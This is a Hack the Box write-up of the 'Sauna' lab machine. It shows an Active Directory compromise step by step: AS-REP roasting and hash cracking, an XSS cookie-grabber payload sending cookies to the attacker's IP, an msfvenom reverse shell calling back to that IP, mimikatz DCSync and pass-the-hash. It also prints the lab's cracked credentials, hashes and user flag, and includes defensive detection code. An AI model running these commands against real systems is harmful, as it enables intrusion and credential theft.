opcode

Hack the Box - Sauna

HTB, CTF - 5 min read

Summary

HTB challenges don't always feel realistic, but this one did a good job of presenting challenges and vulnerabilities you see in the real world. It also reminded me of some important concepts, both in offense and defense. Thanks to @WhortonMr for the fun box.

Enumeration

I start with a full port nmap scan, but this estimates another 5 hours to complete.

SYN Stealth Scan Timing: About 1.79% done; ETC: 04:34 (5:19:56 remaining)

So I cancel and run a top 1000 ports scan to reduce the time. This gives me a lot to work with.

root@kali:/home/kali/htb/sauna# nmap -sC -sV --top-ports 1000 -oN nmap_top_1000 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-08 23:16 EDT
Nmap scan report for 10.10.10.175
Host is up (0.057s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-07-09 10:21:12Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h04m48s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-07-09T10:23:30
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 309.50 seconds

I re-run my full port scan in the background, because you never know when a port might be hiding at the top end of the range. While it runs, I start working through the ports I already have.

53 - DNS

I try a quick nslookup to see if it gives up any nameservers.

root@kali:/home/kali# nslookup
> server 127.0.0.1
Default server: 127.0.0.1
Address: 127.0.0.1#53
> server 10.10.10.175
Default server: 10.10.10.175
Address: 10.10.10.175#53
> 10.10.10.175
** server can't find 175.10.10.10.in-addr.arpa: SERVFAIL

I add sauna.htb to my /etc/hosts.

10.10.10.175 sauna.htb

I try a quick zone transfer to see if it responds with any records.

root@kali:/home/kali# dig axfr sauna.htb @10.10.10.175

; <<>> DiG 9.16.4-Debian <<>> axfr sauna.htb @10.10.10.175
;; global options: +cmd
; Transfer failed.

I try a few other things with no luck, so I move on.

80 - HTTP

Whatweb identifies the HTTP server as IIS 10 and the site as built with Bootstrap.

root@kali:/home/kali/htb/sauna# whatweb 10.10.10.175
http://10.10.10.175 [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[example@email.com,info@example.com], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.175], Microsoft-IIS[10.0], Script, Title[Egotistical Bank :: Home]

The main page reveals it's a bank.

images/Untitled.png

I turn on BurpSuite in the background as I click around the different pages. There's an about page with full names of the team members. This might come in handy later.

images/Untitled1.png

There's a contact page with a form.

images/Untitled2.png

I try a quick XSS on each field, with a script source requesting back to a netcat listener on my machine.

root@kali:/home/kali/htb/sauna/# nc -nvlp 80

images/Untitled3.png

The email field tries to validate and fails. I remove it and re-run, and get the following error message.

images/Untitled4.png

I remove all the XSS and try regular strings, and get the same response. I check Burp, and no request is shown. I open Firefox dev tools, and see a POST is being used.

images/Untitled5.png

I click 'edit and resend', modify the request method to be GET, and get a 200.

images/Untitled6.png

Burp captures this request now, so I send it to Repeater, highlight the script tags and use Ctrl-U to URL-encode them.

images/Untitled7.png

I wait a little while and don't receive a connection back. I try one more trick with a cookie grabber, and repeat the encoding process with Ctrl-U.

<script>new Image().src="http://10.10.14.8/fake.jpg?output="+document.cookie;</script>

images/Untitled8.png

Nothing that time either, so time to move on. I do a quick enumeration with dirsearch.py to look for hidden folders, but find nothing I didn't already see in Burp.

Port 88 - Kerberos

I try an nmap script to enumerate some users.

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='sauna.htb',userdb=/usr/share/seclists/Usernames/Names/names.txt sauna.htb

No luck here either.

Port 135 - RPC

I try a null session with rpcclient, but access is denied.

root@kali:/home/kali# rpcclient 10.10.10.175
Enter WORKGROUP\root's password:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE

Port 445 - SMB

I try smbclient with a null session. The login succeeds, but no shares are listed.

root@kali:/home/kali/htb/sauna# smbclient -L //10.10.10.175
Enter WORKGROUP\root's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

I try crackmapexec and get some useful pieces of information: the hostname is SAUNA and the domain is EGOTISTICAL-BANK.LOCAL.

root@kali:/home/kali# crackmapexec smb sauna.htb --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] Error enumerating shares: SMB SessionError: STATUS_USER_SESSION_DELETED(The remote user session has been deleted.)

I update my /etc/hosts to reflect this new information.

10.10.10.175 sauna.EGOTISTICAL-BANK.local
10.10.10.175 EGOTISTICAL-BANK.LOCAL

Re-running some of the commands I ran before with the correct domain returns a little more info.

root@kali:/home/kali# nmap -p 389 --script ldap-search EGOTISTICAL-BANK.local
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-09 00:31 EDT
Nmap scan report for EGOTISTICAL-BANK.local (10.10.10.175)
Host is up (0.055s latency).
rDNS record for 10.10.10.175: sauna.EGOTISTICAL-BANK.local

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search:
|   Context: DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: DC=EGOTISTICAL-BANK,DC=LOCAL
|         objectClass: top
|         objectClass: domain
|         objectClass: domainDNS
|         distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
|         instanceType: 5
|         whenCreated: 2020/01/23 05:44:25 UTC
|         whenChanged: 2020/07/09 10:14:31 UTC
|         subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|         subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|         subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         uSNCreated: 4099
|         dSASignature: \x01\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xBE\xE0\xB3\xC6%\xECD\xB2\xB9\x9F\xF8\D\xB2\xEC
|         uSNChanged: 57366
|         name: EGOTISTICAL-BANK
...
|     dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
|_    dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds

Nothing super useful, but the minimum password length is 7, and there is an object called "Hugo Smith".

Exploitation Part 1

I'm coming up short on enumeration, so I stop, step back for a second and think about the most interesting things I've found:

  1. Some forms that seem to be filtered pretty heavily, with POST methods that fail.
  2. A list of employees.

I put together a list of the users found on the 'About Us' page, and type some variations that are common, then save it to a text file.

fergus
fergus.smith
fergussmith
fsmith
hugo
hugo.bear
hugobear
hbear
steven
steven.kerb
stevenkerb
shaun
shaun.coins
shauncoins
scoins
bowie
bowie.taylor
bowietaylor
btaylor
sophie
sophie.driver
sophiedriver
sdriver

There are only a few things I can try without having to brute force each one. From a previous box on HTB I completed, Forest, I learned about GetNPUsers.py from the Impacket examples library.

root@kali:/home/kali/htb/sauna# GetNPUsers.py EGOTISTICALBANK/ -no-pass -usersfile users.txt -dc-ip 10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICALBANK:21309fe9bed91587b8c205465ded379f$0d75a1210adc57c73dafd140f6538d812461751e6264782909e7b4f096c82bb350e4113966a2aacf92a3ddbc1b2d268f38e5713843e17fb294e4642b04c02b0b8ca97696c4bb6e007c3328592f6402d1c9bdf597c07926b0f0a5dbfb09855b040f53c4a978ab2edd76e691fac3d172ef2375b9390030be934f1fa4472de36656a8ba75bde91a06d52117dc112a8dd9ce4ee957e1bd04410045e6b0adf8930bcf0d49c35527882c170410f7f64cb9c7f1c9205d386cd64deee4cc144c7c545ce9622b509a9969d3661ec79e48a7025cefbead42a6e10b7737b5d2df6872fb960dc8235ed966d5701a092c7aca24fda3a6c465060bcfc17c730b
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

I've got a hash. What just happened?

GetNPUsers.py asks the KDC for AS-REPs on behalf of accounts that have Kerberos pre-authentication disabled. A good explanation is here:

https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

The TLDR version is that the first step in Kerberos authentication is pre-authentication. This is the point where the user enters their password and the client proves knowledge of it to the Domain Controller before the KDC will issue a ticket.

Pre-authentication is enabled by default for all accounts, but you can turn it off if you want to. There are sometimes architectural reasons for doing this, but it is not a good idea: without it, anyone who knows the username gets back an AS-REP encrypted with a key derived from that user's password. If you can grab one of those hashes, you can try to crack it offline with hashcat.

kali@wallaby:~/$ hashcat -m 18200 /home/kali/hashes/sauna.hash /usr/share/wordlists/rockyou.txt

$krb5asrep$23$fsmith@EGOTISTICALBANK:21309fe9bed91587b8c205465ded379f$0d75a1210adc57c73dafd140f6538d812461751e6264782909e7b4f096c82bb350e4113966a2aacf92a3ddbc1b2d268f38e5713843e17fb294e4642b04c02b0b8ca97696c4bb6e007c3328592f6402d1c9bdf597c07926b0f0a5dbfb09855b040f53c4a978ab2edd76e691fac3d172ef2375b9390030be934f1fa4472de36656a8ba75bde91a06d52117dc112a8dd9ce4ee957e1bd04410045e6b0adf8930bcf0d49c35527882c170410f7f64cb9c7f1c9205d386cd64deee4cc144c7c545ce9622b509a9969d3661ec79e48a7025cefbead42a6e10b7737b5d2df6872fb960dc8235ed966d5701a092c7aca24fda3a6c465060bcfc17c730b:Thestrokes23

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICALBANK:21309fe9bed915...7c730b
Time.Started.....: Wed Jul 8 23:12:04 2020 (1 sec)
Time.Estimated...: Wed Jul 8 23:12:05 2020 (0 secs)
Guess.Base.......: File (/home/brandon/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9215.4 kH/s (7.20ms) @ Accel:512 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10616832/14344385 (74.01%)
Rejected.........: 0/10616832 (0.00%)
Restore.Point....: 10321920/14344385 (71.96%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ahki_22 -> Saboka54
Hardware.Mon.#1..: Temp: 60c Fan: 28% Util: 35% Core:1797MHz Mem:4006MHz Bus:8

user: fsmith

pass: Thestrokes23
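Before moving on, the defender's view of what just happened. This is an added example, not code from the writeup: it audits a (constructed) export of userAccountControl values for the DONT_REQ_PREAUTH bit that GetNPUsers.py hunts for, and scans constructed Windows Security 4768 (TGT requested) records for the AS-REP roasting signature (no pre-authentication plus RC4, which is the etype 23 in the hash above) and for the burst of "client not found" errors a username list leaves behind.

```python
import json
from collections import Counter

DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit GetNPUsers.py looks for
RC4_HMAC = 0x17               # Kerberos etype 23, the "$23$" in the hash above

# Constructed sample of an LDAP export: sAMAccountName -> userAccountControl.
SAMPLE_ACCOUNTS = {
    "Administrator": 0x10200,   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    "FSmith": 0x410200,         # same, plus DONT_REQ_PREAUTH
    "svc_loanmgr": 0x10200,
}

def audit_preauth(accounts):
    """Return account names that do not require Kerberos pre-authentication."""
    return sorted(n for n, uac in accounts.items() if uac & DONT_REQ_PREAUTH)

# Constructed Security event 4768 records, one JSON object per line, in the
# shape a SIEM forwards them. Failed requests carry PreAuthType "-".
SAMPLE_4768 = """\
{"EventID":4768,"TargetUserName":"svc_loanmgr","IpAddress":"10.10.10.20","PreAuthType":"2","TicketEncryptionType":"0x12","Status":"0x0"}
{"EventID":4768,"TargetUserName":"fergus","IpAddress":"10.10.14.8","PreAuthType":"-","TicketEncryptionType":"0xffffffff","Status":"0x6"}
{"EventID":4768,"TargetUserName":"fergus.smith","IpAddress":"10.10.14.8","PreAuthType":"-","TicketEncryptionType":"0xffffffff","Status":"0x6"}
{"EventID":4768,"TargetUserName":"fsmith","IpAddress":"10.10.14.8","PreAuthType":"0","TicketEncryptionType":"0x17","Status":"0x0"}
{"EventID":4768,"TargetUserName":"hugo","IpAddress":"10.10.14.8","PreAuthType":"-","TicketEncryptionType":"0xffffffff","Status":"0x6"}
{"EventID":4769,"TargetUserName":"fsmith","IpAddress":"10.10.14.8","PreAuthType":"2","TicketEncryptionType":"0x17","Status":"0x0"}
"""

def parse_events(records):
    """Parse newline-delimited JSON, skipping blank lines."""
    return [json.loads(l) for l in records.splitlines() if l.strip()]

def find_asrep_roast_events(records):
    """Return (user, source ip) for successful TGT requests that used no
    pre-authentication and an RC4 session key: the AS-REP roasting signature."""
    hits = []
    for ev in parse_events(records):
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") != "0":          # 0 = logon without pre-auth
            continue
        if int(ev.get("TicketEncryptionType", "0x0"), 16) != RC4_HMAC:
            continue
        hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits

def find_unknown_principal_bursts(records, threshold=3):
    """Return source addresses that produced at least `threshold`
    KDC_ERR_C_PRINCIPAL_UNKNOWN (Status 0x6) results: the trace a username
    list run through GetNPUsers.py leaves on the DC."""
    counts = Counter(ev["IpAddress"] for ev in parse_events(records)
                     if ev.get("EventID") == 4768 and ev.get("Status") == "0x6")
    return sorted(ip for ip, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    print("no pre-auth:", audit_preauth(SAMPLE_ACCOUNTS))
    print("AS-REP roast candidates:", find_asrep_roast_events(SAMPLE_4768))
    print("guessing bursts from:", find_unknown_principal_bursts(SAMPLE_4768))
```

The 4768 checks only work if the DC audits "Kerberos Authentication Service" success and failure; the AES-only fix (removing RC4) does not remove the exposure, it just makes the hash slower to crack.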

Now to figure out what to do with these creds. I try two handy static binaries of the Impacket examples, smbexec.py and psexec.py, but no luck.

https://github.com/ropnop/impacket_static_binaries

root@kali:/home/kali/htb/sauna# psexec.py fsmith@EGOTISTICAL-BANK.local
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on EGOTISTICAL-BANK.local.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'print$' is not writable.
[-] share 'SYSVOL' is not writable.
root@kali:/home/kali/htb/sauna# smbexec.py fsmith@EGOTISTICAL-BANK.local
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

Luckily, as I'm scratching my head, my full port nmap scan comes back. There is an interesting port, although you wouldn't know it from the banner, because nmap misidentifies it half of the time.

5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found

This port is actually WinRM (Windows Remote Management), a remote management service that gives you a PowerShell session over HTTP. There is a great tool I haven't used in a while called evil-winrm. It's pretty simple to install on Kali.

root@kali:/home/kali/htb/sauna# gem install evil-winrm

I launch evil-winrm and get a shell.

root@kali:/home/kali/htb/sauna# evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith

And I get the user flag.

images/Untitled9.png

user.txt
1b5520b98d97cf17f24122a55baf70cf

Exploitation Part 2

To speed up the enumeration phase, as it's late, I use evil-winrm's built-in upload function to push winPEAS to the box.

*Evil-WinRM* PS C:\Users\FSmith\1> upload /opt/win/winPEAS.exe
Info: Uploading /opt/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe to C:\Users\FSmith\1\winPEAS.exe


Data: 322216 bytes of 322216 bytes copied

Info: Upload successful!

It makes short work of the machine and discovers AutoLogon credentials stored in the registry.

[+] Looking for AutoLogon credentials(T1012)
    Some AutoLogon credentials were found!!
    DefaultDomainName    :  EGOTISTICALBANK
    DefaultUserName      :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword      :  Moneymakestheworldgoround!

This is good, because based on the naming scheme this is a service account. Trying the credentials over a variety of protocols, though, they don't work as-is; it seems these are not the current credentials.

So I list the accounts on the domain.

C:\Users\FSmith\1>net users /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr

It looks like the user account has been renamed to svc_loanmgr. I retry with the new user name and it's successful.

root@kali:/home/kali/htb/sauna# evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

It looks like we are in a similar boat to FSmith as far as local privileges go. I need to repeat my enumeration process with this account to look for anything different. WinPEAS returns nothing new, so now I need to enumerate what I can do within AD.

I could spend hours enumerating by hand, or I can collect with SharpHound and load the data into BloodHound for analysis.

*Evil-WinRM* PS C:\Users\svc_loanmgr\1> upload /opt/BloodHound/Ingestors/SharpHound.exe
Info: Uploading /opt/BloodHound/Ingestors/SharpHound.exe to C:\Users\svc_loanmgr\1\SharpHound.exe


Data: 1110016 bytes of 1110016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc_loanmgr\1> ./SharpHound.exe
-----------------------------------------------
Initializing SharpHound at 4:21 AM on 7/10/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 60 objects finished (+60 ∞)/s -- Using 27 MB RAM
Enumeration finished in 00:00:00.4067424
Compressing data to .\20200710042133_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 4:21 AM on 7/10/2020! Happy Graphing!

Then I download the zip with evil-winrm, unpack the files and import them into BloodHound. For installing and running BloodHound, this guide is a good reference:

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux

images/Untitled10.png

Selecting the query 'Find Principals with DCSync Rights', I find svc_loanmgr has the two replication privileges necessary to perform a DCSync attack.

images/Untitled11.png
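The two rights the BloodHound query looks for are the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object. As an added example (not code from the writeup), the block below does the defender's version of that query over a constructed list of ACEs, and then checks constructed Security event 4662 records for a non-DC principal exercising those rights, which is what "monitor accounts with DCSync privileges" in the lessons below comes down to. The EXPECTED allowlist is an assumption for this domain.

```python
import json
import re

# Extended-right GUIDs on the domain object that directory replication requires.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcb2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcb2"
REPL_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

# Assumed allowlist: the DC's computer account and the built-in groups that
# hold the rights by default. Anything else replicating is worth a look.
EXPECTED = {"SAUNA$", "Domain Controllers", "Enterprise Domain Controllers", "Administrators"}

# Constructed ACEs on the domain object as (trustee, extended-right GUID),
# mirroring what the BloodHound query above reports.
SAMPLE_DOMAIN_ACES = [
    ("Domain Controllers", DS_REPL_GET_CHANGES_ALL),
    ("Enterprise Domain Controllers", DS_REPL_GET_CHANGES),
    ("Administrators", DS_REPL_GET_CHANGES),
    ("Administrators", DS_REPL_GET_CHANGES_ALL),
    ("svc_loanmgr", DS_REPL_GET_CHANGES),
    ("svc_loanmgr", DS_REPL_GET_CHANGES_ALL),
    ("FSmith", DS_REPL_GET_CHANGES),   # only one of the two: not enough for DCSync
]

def principals_with_dcsync(aces, expected=EXPECTED):
    """Return trustees outside the allowlist that hold both replication rights."""
    held = {}
    for trustee, right in aces:
        if right in REPL_RIGHTS:
            held.setdefault(trustee, set()).add(right)
    return sorted(t for t, r in held.items() if r == REPL_RIGHTS and t not in expected)

# Constructed Security event 4662 records. A DC only writes these when
# "Audit Directory Service Access" is on and the domain object carries a SACL.
# AccessMask 0x100 is a control-access check; Properties lists the GUIDs used.
# The last line uses a zero GUID as a placeholder for an unrelated attribute.
SAMPLE_4662 = """\
{"EventID":4662,"SubjectUserName":"SAUNA$","AccessMask":"0x100","Properties":"{1131f6aa-9c07-11d1-f79f-00c04fc2dcb2}"}
{"EventID":4662,"SubjectUserName":"svc_loanmgr","AccessMask":"0x100","Properties":"{1131f6ad-9c07-11d1-f79f-00c04fc2dcb2}"}
{"EventID":4662,"SubjectUserName":"svc_loanmgr","AccessMask":"0x100","Properties":"{1131f6aa-9c07-11d1-f79f-00c04fc2dcb2}"}
{"EventID":4662,"SubjectUserName":"FSmith","AccessMask":"0x10","Properties":"{00000000-0000-0000-0000-000000000000}"}
"""

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

def find_dcsync_events(records, expected=EXPECTED):
    """Return (subject, right GUID) pairs for replication control-access checks
    performed by principals that are not expected to replicate."""
    hits = []
    for line in records.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
            continue
        used = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))} & REPL_RIGHTS
        if used and ev["SubjectUserName"] not in expected:
            hits.extend((ev["SubjectUserName"], g) for g in sorted(used))
    return hits

if __name__ == "__main__":
    print("can DCSync:", principals_with_dcsync(SAMPLE_DOMAIN_ACES))
    print("replication by unexpected principals:", find_dcsync_events(SAMPLE_4662))
```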

Mimikatz is the perfect tool for this, but evil-winrm doesn't handle it too well, so I generate a reverse shell with msfvenom.

root@kali:/home/kali/htb/sauna# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe

Then I upload it to Sauna and get a reverse shell.

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/htb/sauna/shell.exe
Info: Uploading /home/kali/htb/sauna/shell.exe to C:\Users\svc_loanmgr\Documents\shell.exe

root@kali:/home/kali/htb/sauna# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.175] 57685
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\svc_loanmgr\1>

Then I run mimikatz.

C:\Users\svc_loanmgr\1>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.1.1 (x86) built on Mar 25 2018 21:00:57
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::dcsync /domain:EGOTISTICAL-BANK.local /user:Administrator
[DC] 'EGOTISTICAL-BANK.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 1/24/2020 10:14:15 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: d9485863c1e9e05851aa40cbb4ab9dff
    ntlm- 0: d9485863c1e9e05851aa40cbb4ab9dff
    ntlm- 1: 7facdc498ed1680c4fd1448319a8c04f
    lm  - 0: ee8c50e6bc332970a8e8a632488f5211

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : caab2b641b39e342e0bdfcd150b1683e

* Primary:Kerberos-Newer-Keys *
    Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
      aes128_hmac       (4096) : 145e4d0e4a6600b7ec0ece74997651d0
      des_cbc_md5       (4096) : 19d5f15d689b1ce5
    OldCredentials
      aes256_hmac       (4096) : 9637f48fa06f6eea485d26cd297076c5507877df32e4a47497f360106b3c95ef
      aes128_hmac       (4096) : 52c02b864f61f427d6ed0b22639849df
      des_cbc_md5       (4096) : d9379d13f7c15d1c

* Primary:Kerberos *
    Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
    Credentials
      des_cbc_md5       : 19d5f15d689b1ce5
    OldCredentials
      des_cbc_md5       : d9379d13f7c15d1c

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  3fbea1ff422da035f1dc9b0ce45e84ea
    02  708091daa9db25abbd1d94246e4257e2
    03  417f2e40d5be8d436af749ed9fddb0b0
    04  3fbea1ff422da035f1dc9b0ce45e84ea
    05  50cb7cfb64edf83218804d934e30d431
    06  781dbcf7b8f9079382a1948f26f561ee
    07  4052111530264023a7d445957f5146e6
    08  8f4bffc5d94cc294272cd0c836e15c47
    09  0c81bc892ea87f7dd0f4a3a05b51f158
    10  f8c10a5bd37ea2568976d47ef12e55b9
    11  8f4bffc5d94cc294272cd0c836e15c47
    12  023b04503e3eef421de2fcaf8ba1297d
    13  613839caf0cf709da25991e2e5cb63cf
    14  16974c015c9905fb27e55a52dc14dfb0
    15  3c8af7ccd5e9bd131849990d6f18954b
    16  2b26fb63dcbf03fe68b67cdd2c72b6e6
    17  6eeda5f64e4adef4c299717eafbd2850
    18  3b32ec94978feeac76ba92b312114e2c
    19  b25058bc1ebfcac10605d39f65bff67f
    20  89e75cc6957728117eb1192e739e5235
    21  7e6d891c956f186006f07f15719a8a4e
    22  a2cada693715ecc5725a235d3439e6a2
    23  79e1db34d98ccd050b493138a3591683
    24  1f29ace4f232ebce1a60a48a45593205
    25  9233c8df5a28ee96900cc8b59a731923
    26  08c02557056f293aab47eccf1186c100
    27  695caa49e68da1ae78c1523b3442e230
    28  57d7b68bd2f06eae3ba10ca342e62a78
    29  3f14bb208435674e6a1cb8a957478c18

With the Administrator NTLM hash, I can pass the hash with Impacket's smbexec.py to get a shell.

root@kali:/home/kali/htb/sauna# smbexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff administrator@EGOTISTICAL-BANK.local
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

